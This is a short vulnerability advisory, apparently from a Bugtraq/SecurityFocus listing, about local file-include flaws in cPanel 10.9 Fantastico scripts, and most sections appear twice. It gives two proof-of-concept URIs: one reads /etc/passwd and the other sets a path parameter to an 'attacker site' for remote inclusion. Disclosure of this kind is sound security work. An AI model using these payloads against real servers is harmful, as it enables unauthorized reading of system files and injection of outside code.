cPanel Multiple Local File Include Vulnerabilities
BID:22915
Info
cPanel Multiple Local File Include Vulnerabilities
| Bugtraq ID: | 22915 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 11 2007 12:00AM |
| Updated: | Mar 12 2007 04:54PM |
| Credit: | cyb3rt & 020 are credited with the discovery of these vulnerabilities. |
| Vulnerable: |
cPanel cPanel 10.9 build 134 cPanel cPanel 10.9 build 125 cPanel cPanel 10.9 |
| Not Vulnerable: | |
Discussion
cPanel Multiple Local File Include Vulnerabilities
cPanel is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues may allow an unauthorized user to view local files on the affected webserver.
These issues affect cPanel 10.9.x and prior versions.
cPanel is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues may allow an unauthorized user to view local files on the affected webserver.
These issues affect cPanel 10.9.x and prior versions.
Exploit / POC
cPanel Multiple Local File Include Vulnerabilities
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://example.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd
http://example.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=attacker site
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://example.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd
http://example.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=attacker site
Solution / Fix
cPanel Multiple Local File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].